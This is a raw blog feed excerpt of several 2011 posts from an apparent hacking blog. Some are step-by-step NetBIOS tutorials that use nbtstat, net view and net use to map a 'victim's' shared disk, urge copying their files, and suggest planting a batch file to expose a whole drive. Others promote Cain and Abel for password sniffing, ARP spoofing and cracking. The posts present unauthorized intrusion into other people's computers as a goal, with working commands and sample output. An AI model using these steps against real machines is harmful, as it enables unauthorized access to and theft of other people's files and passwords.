&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: medium;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #3d85c6;&quot;&gt;Step 3 &amp;nbsp;- Hacking into a computer&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
---------------------------------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Finally it’s time. By now we know: that our target is online, our target has file sharing, and our target’s computer name. So it’s time to break in. We will now &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD1&quot;&gt;locate&lt;/span&gt; the shared drives, folders, files, or printers. Type in “net view \\(IP Address of Target)”&lt;br /&gt;
An example for this tutorial would be: “net view \\192.168.1.103”&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
We have our just found our share name. In this case, under the share name is “C,” meaning that the only shared thing on the computer is C. Then to the right, under Type, it says “Disk.” This means that it is the actual C DISK of the computer. The C DISK can sometimes be an entire person’s hard drive.&lt;br /&gt;
&lt;br /&gt;
All&#39;s that is left to do is “map” the shared drive onto our computer. This means that we will make a drive on our computer, and all the contents of the targets computer can be accessed through our created network drive. Type in “net use K: \\(IP Address of Target)\(Shared Drive). For my example in thistutorial , “net use K: \\192.168.1.103\C.” Ok, let’s say that you plan on doing this again to a different person, do u see the “K after “net use?” This is the letter of &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD10&quot;&gt;the drive&lt;/span&gt; that you are making on your computer. It can be any letter you wish, as long as the same letter is not in use by your computer. So it could be “net use G...,” for a different target.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
As you can see, for my hack I have already used “K,” so I used “G” instead. You may also do the same for multiple hacks. If it worked, it will say “The command completed successfully.” If not, you will have to go retrace you steps. Now open up “mycomputer” under the start menu, and your newly created network drive should be there. &lt;br /&gt;
&lt;br /&gt;
&lt;img border=&quot;0&quot; class=&quot;linked-image&quot; src=&quot;http://i98.photobucket.com/albums/l246/h2-h4cks/netbios13.jpg&quot; style=&quot;border: 1px solid rgb(204, 204, 204); font-family: verdana; padding: 4px;&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Now, if you disconnect from the WAN or LAN, you will not be able to access this drive, hence the name Network Drive. The drive will not be deleted after you disconnect though, but you won’t be able to access it until you reconnect to the network. So if you are doing this for the content ofthe drive, I recommend dragging the files and folders inside of the drive onto your computer , because you never know if the target changes the sharing setting. If you are just doing this to hack something, then go explore it and have some well deserved fun!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Congratulations! You’ have &lt;b&gt;hacked into the victims computer&lt;/b&gt;&lt;br /&gt;
But, before you leave, please look over some of this information for further help and just for thanks to me.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #3d85c6;&quot;&gt;Commands used in this tutorial:&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
PING&lt;br /&gt;
NBTSTAT -a (IP Address of Target)&lt;br /&gt;
NET VIEW \\(IP Address of Target)&lt;br /&gt;
NET USE K: \\(IP Address of Target)\(SHARENAME)&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: xx-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: 11px;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small; font-weight: normal;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://advancehacker.blogspot.com/feeds/7366468741442964363/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://advancehacker.blogspot.com/2011/05/how-to-hack-into-computer-netbios.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/7366468741442964363'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/7366468741442964363'/><link rel='alternate' type='text/html' href='http://advancehacker.blogspot.com/2011/05/how-to-hack-into-computer-netbios.html' title='How to hack into a computer - Netbios hacking'/><author><name>Ajay Goswami</name><uri>http://www.blogger.com/profile/12488503316083936543</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnmPJtYe85QJnFygmjSifgZS-qI3hN0XyhHDMmvfTd4NkWaMjW2zoWLNdEKVlmyL0IeYgUT-C0azLCl_LKmdDq0NgN3FYqErw4AsPSyZk4TY0rK8OWRLVO5Y_bLIlzmo/s220/Hacking.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8758676234514739420.post-859705750407723387</id><published>2011-05-07T23:15:00.000-07:00</published><updated>2011-05-07T23:15:35.933-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Computer Hack"/><title type='text'>Hacking into another persons computer</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;b&gt;Step 1 &lt;/b&gt;&lt;br /&gt;
First of all,get a good IP scanner angry ip scanner is a good one you can get it here:&lt;br /&gt;
&lt;b&gt;&lt;a href=&quot;http://www.angryziber.com/ipscan/&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #3d85c6;&quot;&gt;Angry ip scanner Download&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Step 2&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;Now click on start and then goto run and then type there &quot;&lt;b&gt;CMD&lt;/b&gt;&quot; and press ok&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;br /&gt;
&amp;nbsp;This is what you see: &lt;br /&gt;
&lt;b&gt; c:\windows&amp;gt;&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
Now this is what you have to do ----&lt;b&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Replace 255.255.255.255 with the victims IP address.&lt;/span&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt; c:\windows&amp;gt;nbtstat -a 255.255.255.255&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
If you see this your in&amp;nbsp;&lt;b&gt;NetBIOS Remote Machine Name Table&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt; Name Type Status &lt;/b&gt; --------------------------------------------------------------- &lt;br /&gt;
user&amp;lt;00&amp;gt; UNIQUE Registered &lt;br /&gt;
workgroup &amp;lt;00&amp;gt; GROUP Registered &lt;br /&gt;
user &amp;lt;03&amp;gt; UNIQUE Registered &lt;br /&gt;
user &amp;lt;20&amp;gt; UNIQUE Registered &lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #cc0000;&quot;&gt;&lt;b&gt; MAC Address&lt;/b&gt;&lt;/span&gt; = &lt;b&gt;xx-xx-xx-xx-xx-xx &lt;/b&gt;&lt;br /&gt;
--------------------------------------------------------------- &lt;br /&gt;
&lt;br /&gt;
If you don&#39;t get the number &lt;b&gt;&amp;lt;20&amp;gt;. &lt;/b&gt;&lt;br /&gt;
The victim disabled the File And Printer Sharing, find &amp;nbsp;another victim. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt; Step 3:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Type down: &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt; c:\windows&amp;gt;net view \\255.255.255.255 &lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
If the output is like this: &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt; Shared resources at \\255.255.255.255 &lt;br /&gt;
ComputerNameGoesHere &lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Sharename Type Used as Comment &lt;br /&gt;
&lt;br /&gt;
------------------------------------------------------------ &lt;br /&gt;
CDISK Disk &lt;b&gt;xxxxx xxxxx&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
The command completed successfully. &lt;br /&gt;
&lt;br /&gt;
&quot;&lt;b&gt;DISK&lt;/b&gt;&quot; shows that the victim is sharing a Disk named as CDISK &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt; Step 4 &lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
you can replace x: by any letter you want but not the letter of your own drive. &lt;br /&gt;
&lt;br /&gt;
CDISK is the name of the shared harddrive.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;br /&gt;
Now type:&lt;br /&gt;
c:\windows&amp;gt;net use x: \\255.255.255.255\CDISK &lt;br /&gt;
&lt;br /&gt;
If the command is successful you are a small time hacker. &lt;br /&gt;
&lt;br /&gt;
Now open windows explorer or just double click on the My Computer icon on your &lt;br /&gt;
desktop and you will see a new network drive X:. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt; Note to newbies: This hack will only work if you have the ip of someone on your network. It will not work if the ip of the person you want to &quot;hack&quot; is not on your network. &lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;Tip: If you can only access your targets shared folder put a batch file in their shared folder with the command C=C if they open it,it will share their hardrive.&lt;/b&gt;&lt;/span&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://advancehacker.blogspot.com/feeds/859705750407723387/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://advancehacker.blogspot.com/2011/05/hacking-into-another-persons-computer.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/859705750407723387'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/859705750407723387'/><link rel='alternate' type='text/html' href='http://advancehacker.blogspot.com/2011/05/hacking-into-another-persons-computer.html' title='Hacking into another persons computer'/><author><name>Ajay Goswami</name><uri>http://www.blogger.com/profile/12488503316083936543</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnmPJtYe85QJnFygmjSifgZS-qI3hN0XyhHDMmvfTd4NkWaMjW2zoWLNdEKVlmyL0IeYgUT-C0azLCl_LKmdDq0NgN3FYqErw4AsPSyZk4TY0rK8OWRLVO5Y_bLIlzmo/s220/Hacking.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8758676234514739420.post-3451972630685594827</id><published>2011-05-07T23:12:00.000-07:00</published><updated>2011-05-07T23:12:03.456-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking News"/><title type='text'>Cain And Abel 4.9.40 Is Available For Download</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;
Cain and abel is a very popular &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD4&quot;&gt;windows&lt;/span&gt; &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD8&quot;&gt;password recovery&lt;/span&gt; program, It allows you to recover almost all kinds of passwords, It also supports wide variety of password cracking methods such as a brute force attack, Dictionary attack, Rainbow Tables, Cryptanalysis attack etc, Cain is mostly &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD7&quot;&gt;used for&lt;/span&gt; the purpose of sniffing and also used to carry out wide variety of Man In the middle attacks.&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6HrO899hSuY2OixnydP3RIn9bddSJyYNbp8yFtYORPsf58VlzBFLwWbeym24QjhLkOk7k44l-LewJl6eSlYbFQbf5Icv7i3m4ECBUzuUhdZ2uPLeVwLTbLKPjIVe5COPeceNuu3T6DsI/s1600/Cain.PNG&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;438&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6HrO899hSuY2OixnydP3RIn9bddSJyYNbp8yFtYORPsf58VlzBFLwWbeym24QjhLkOk7k44l-LewJl6eSlYbFQbf5Icv7i3m4ECBUzuUhdZ2uPLeVwLTbLKPjIVe5COPeceNuu3T6DsI/s640/Cain.PNG&quot; width=&quot;590&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;a href=&quot;http://www.blogger.com/post-create.g?blogID=1136095923721146094&quot; name=&quot;more&quot;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;h4&gt;Features&lt;/h4&gt;&lt;br /&gt;
The Oxid team has just released the newest version of cain and abel &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD3&quot;&gt;software&lt;/span&gt; i.e. Cain and abel 4.9.40, Here are some of the added features in cain and abel 4.9.40:&lt;br /&gt;
&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Added Proxy support for Cain&#39;s &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD6&quot;&gt;Certificate&lt;/span&gt; Collector.&lt;/li&gt;
&lt;li&gt;Added the ability to specify custom proxy authentication credentials for Certificate Collector.&lt;/li&gt;
&lt;li&gt;Added ProxyHTTPS Man-in-the-Middle Sniffer (TCP port 8080).&lt;/li&gt;
&lt;li&gt;HTTP, APR-HTTPS and APR-ProxyHTTPS sniffer filters are now separated.&lt;/li&gt;
&lt;li&gt;Added progress &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD2&quot;&gt;bar&lt;/span&gt; indicator in the off-line capture file &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD5&quot;&gt;function&lt;/span&gt;.&lt;/li&gt;
&lt;li&gt;Bug fixed in ProxyHTTPS Man-in-the-Middle Sniffer parsing &quot;Connection Established&quot; string.&lt;/li&gt;
&lt;li&gt;Bug fixed in VoIP Sniffer creating MP3 Mono files.&lt;/li&gt;
&lt;li&gt;Bug fixed in RTP Sniffer processing off-line capture files.&lt;/li&gt;
&lt;li&gt;WinRTGen recompiled with OpenSSL library version 0.9.8q.&lt;/li&gt;
&lt;li&gt;OpenSSL library upgrade to version 0.9.8q.&lt;/li&gt;
&lt;li&gt;Winpcap library upgrade to version 4.1.2.&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://advancehacker.blogspot.com/feeds/3451972630685594827/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://advancehacker.blogspot.com/2011/05/cain-and-abel-4940-is-available-for.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/3451972630685594827'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/3451972630685594827'/><link rel='alternate' type='text/html' href='http://advancehacker.blogspot.com/2011/05/cain-and-abel-4940-is-available-for.html' title='Cain And Abel 4.9.40 Is Available For Download'/><author><name>Ajay Goswami</name><uri>http://www.blogger.com/profile/12488503316083936543</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnmPJtYe85QJnFygmjSifgZS-qI3hN0XyhHDMmvfTd4NkWaMjW2zoWLNdEKVlmyL0IeYgUT-C0azLCl_LKmdDq0NgN3FYqErw4AsPSyZk4TY0rK8OWRLVO5Y_bLIlzmo/s220/Hacking.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6HrO899hSuY2OixnydP3RIn9bddSJyYNbp8yFtYORPsf58VlzBFLwWbeym24QjhLkOk7k44l-LewJl6eSlYbFQbf5Icv7i3m4ECBUzuUhdZ2uPLeVwLTbLKPjIVe5COPeceNuu3T6DsI/s72-c/Cain.PNG" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8758676234514739420.post-5827280907162044321</id><published>2011-05-07T23:06:00.000-07:00</published><updated>2011-05-07T23:06:38.757-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Computer Hack"/><title type='text'>Hack a Computer using Chain And able</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1LJ4FvXl35rK-xXHD6eXk2PFDYfg8ezrGCCOUe0vBEGClbD_PKhJopoBHId3LbfzCl445BiWvRoTvmdzfV29j4R57rHzlNBsKiMhZn_VJr2IhvRVxQ9iNDxwi9ARdKBHhbFJUS5ACGgs/s1600-h/wolfgang-router2-pic1.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Hack computer&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1LJ4FvXl35rK-xXHD6eXk2PFDYfg8ezrGCCOUe0vBEGClbD_PKhJopoBHId3LbfzCl445BiWvRoTvmdzfV29j4R57rHzlNBsKiMhZn_VJr2IhvRVxQ9iNDxwi9ARdKBHhbFJUS5ACGgs/s320/wolfgang-router2-pic1.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;span style=&quot;font-weight: bold;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-weight: normal;&quot;&gt;&lt;/span&gt;Learn to&lt;/span&gt; &lt;strong&gt;Hack someones computer with cain and abel&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-weight: bold;&quot;&gt;Cain and Abel&lt;/span&gt; (sometimes called simply &quot;Cain&quot;) is a Windows password recovery tool. It can recover many kinds of passwords using methods such as network packet sniffing, cracking various password hashes by using methods such as dictionary attacks, brute force and cryptanalysis attacks. Cryptanalysis attacks are done via rainbow tables which can be generated with the winrtgen.exe program provided with Cain and Abel. Cain and Abel is maintained by Massimiliano Montoro.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://umeshkumarkushwah.blogspot.com/search/label/hacking%20tool&quot; name=&quot;more&quot;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;Cain &amp;amp; Abel is a useful tool for network administrators, teachers, security consultants/professionals, forensic staff, security software vendors, professional penetration tester and everyone else that plans to use it for ethical reasons.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Status with virus scanners&lt;/strong&gt;&lt;br /&gt;
&amp;nbsp;Some virus scanners, notably &lt;a href=&quot;http://www.avast.com/&quot;&gt;Avast&lt;/a&gt;! detect Cain and Abel as &#39;malware&#39; &quot;Win32:Cain-B [Tool]&quot;. It&#39;s classified in Avast! as &quot;Other potentially dangerous program&quot;. The author, and owner of oxid.it states that his programs are not Malware. Even if Cain&#39;s install directory, as well as the word &quot;Cain&quot;, are added to Avast&#39;s exclude list, the real-time scanner will stop Cain from functioning. The latest version of Avast no longer blocks &lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: xx-small; font-weight: normal;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;How to hack a Computer with Cain and Able:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;The latest version is faster and contains a lot of new features like ARP (Arp Poison Routing) which enables sniffing on switched LANs&lt;br /&gt;
and Man-in-the-Middle attacks. The sniffer in this version can also analyze encrypted protocols such as SSH-1 and HTTPS, and contains filters to capture credentials from a wide range of authentication mechanisms. The new version also ships routing protocols authentication monitors and routes extractors, dictionary and brute-force crackers for all common hashing algorithms and for several specific authentications, password/hash calculators, cryptanalysis attacks, password decoders and some not so common utilities related to network and system security.&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;a href=&quot;http://www.oxid.it/downloads/ca_setup.exe&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #3d85c6;&quot;&gt;Download Cain and Able&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Features:&lt;/strong&gt;&lt;br /&gt;
1.WEP cracking&lt;br /&gt;
2.Speeding up packet capture speed by wireless packet injection&lt;br /&gt;
3.Ability to record VoIP conversations&lt;br /&gt;
4.Decoding scrambled passwords&lt;br /&gt;
5.Calculating hashes&lt;br /&gt;
6.Traceroute&lt;br /&gt;
7.Revealing password boxes&lt;br /&gt;
8.Uncovering cached passwords&lt;br /&gt;
9.Dumping protected storage passwords&lt;br /&gt;
10.ARP spoofing&lt;br /&gt;
11.IP to MAC Address resolver&lt;br /&gt;
12.Network Password Sniffer&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://advancehacker.blogspot.com/feeds/5827280907162044321/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://advancehacker.blogspot.com/2011/05/hack-computer-using-chain-and-able.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/5827280907162044321'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/5827280907162044321'/><link rel='alternate' type='text/html' href='http://advancehacker.blogspot.com/2011/05/hack-computer-using-chain-and-able.html' title='Hack a Computer using Chain And able'/><author><name>Ajay Goswami</name><uri>http://www.blogger.com/profile/12488503316083936543</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnmPJtYe85QJnFygmjSifgZS-qI3hN0XyhHDMmvfTd4NkWaMjW2zoWLNdEKVlmyL0IeYgUT-C0azLCl_LKmdDq0NgN3FYqErw4AsPSyZk4TY0rK8OWRLVO5Y_bLIlzmo/s220/Hacking.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1LJ4FvXl35rK-xXHD6eXk2PFDYfg8ezrGCCOUe0vBEGClbD_PKhJopoBHId3LbfzCl445BiWvRoTvmdzfV29j4R57rHzlNBsKiMhZn_VJr2IhvRVxQ9iNDxwi9ARdKBHhbFJUS5ACGgs/s72-c/wolfgang-router2-pic1.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8758676234514739420.post-5938639300714091635</id><published>2011-05-07T23:03:00.001-07:00</published><updated>2011-05-07T23:03:58.518-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Netbios hacking"/><title type='text'>Netbios Hacking - A Network hack</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div style=&quot;color: #990000; font-family: inherit;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;b&gt;THIS NETBIOS HACKING GUIDE WILL TELL YOU ABOUT HACKING REMOTE COMPUTER AND GAINING ACCESS TO IT’S HARD-DISK OR PRINTER.NETBIOS HACK IS THE EASIEST WAY TO BREAK INTO A REMOTE COMPUTER.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: inherit;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: inherit;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq4Yj_kurECR-OCWUxrMQjUOmALHlO3hH1iIk4PCnla67ML5bZZZdmbzS_OEZHPipKy2Env1FP2dm0fi3eSRNZ-EZch3_Ih7XcynJnXeIbrCQDGenYSIH_0g_ec2NoJGJYdQdYvfAmviQ/s1600/3531185385_2fdbd75f24.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;164&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq4Yj_kurECR-OCWUxrMQjUOmALHlO3hH1iIk4PCnla67ML5bZZZdmbzS_OEZHPipKy2Env1FP2dm0fi3eSRNZ-EZch3_Ih7XcynJnXeIbrCQDGenYSIH_0g_ec2NoJGJYdQdYvfAmviQ/s320/3531185385_2fdbd75f24.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: inherit;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: #990000; font-family: inherit;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;
&lt;u&gt;&lt;b&gt;STEP-BY-STEP NETBIOS HACKING PROCEDURE&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: inherit;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;br /&gt;
1.Open command prompt&lt;br /&gt;
&lt;br /&gt;
2. In the command prompt use the “net view” command&lt;br /&gt;
( OR YOU CAN ALSO USE “NB Scanner” OPTION IN “IP-TOOLS” SOFTWARE BY ENTERING RANGE OF IP ADDRESSS.BY THIS METHOD YOU CAN SCAN NUMBER OF COMPUTERS AT A TIME).&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Example&lt;/b&gt;: &lt;b style=&quot;color: blue;&quot;&gt;C:&amp;gt;net view \59.43.45.212&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
The above is an example for operation using command prompt.”net view” is one of the netbios command to view the shared resources of the remote computer.Here “&lt;b style=&quot;color: blue;&quot;&gt;59.43.45.212&lt;/b&gt;? is an IP address of remote computer that is to be hacked through Netbios.You have to substitute a vlaid IP address in it’s place.If succeeded a list of &lt;b&gt;HARD-DISK DRIVES &amp;amp; PRINTERS&lt;/b&gt; are shown.If not an error message is displayed. So repeat the procedure 2 with a different IP address.&lt;br /&gt;
&lt;br /&gt;
3. After succeeding, use the “net use” command in the command prompt.The “net use” is another netbios command which makes it possible to hack remote drives or printers.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Example-1:&lt;/b&gt; &lt;br /&gt;
&lt;b style=&quot;color: blue;&quot;&gt;C:&amp;gt;net use D: \59.43.45.212F&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Example-2&lt;/b&gt;: &lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;color: blue;&quot;&gt;C:&amp;gt;net use G: \59.43.45.212SharedDocs&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Example-3:&lt;/b&gt; &lt;span style=&quot;background-color: black;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: blue;&quot;&gt;&lt;b&gt;&lt;span style=&quot;background-color: white; color: blue;&quot;&gt;C:&amp;gt;net use I: \59.43.45.212Myprint&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;background-color: blue;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
NOTE: In Examples 1,2 &amp;amp; 3, D:,G: &amp;amp; I: are the Network Drive Names that are to be created on your computer to access remote computer’s hard-disk.&lt;br /&gt;
&lt;br /&gt;
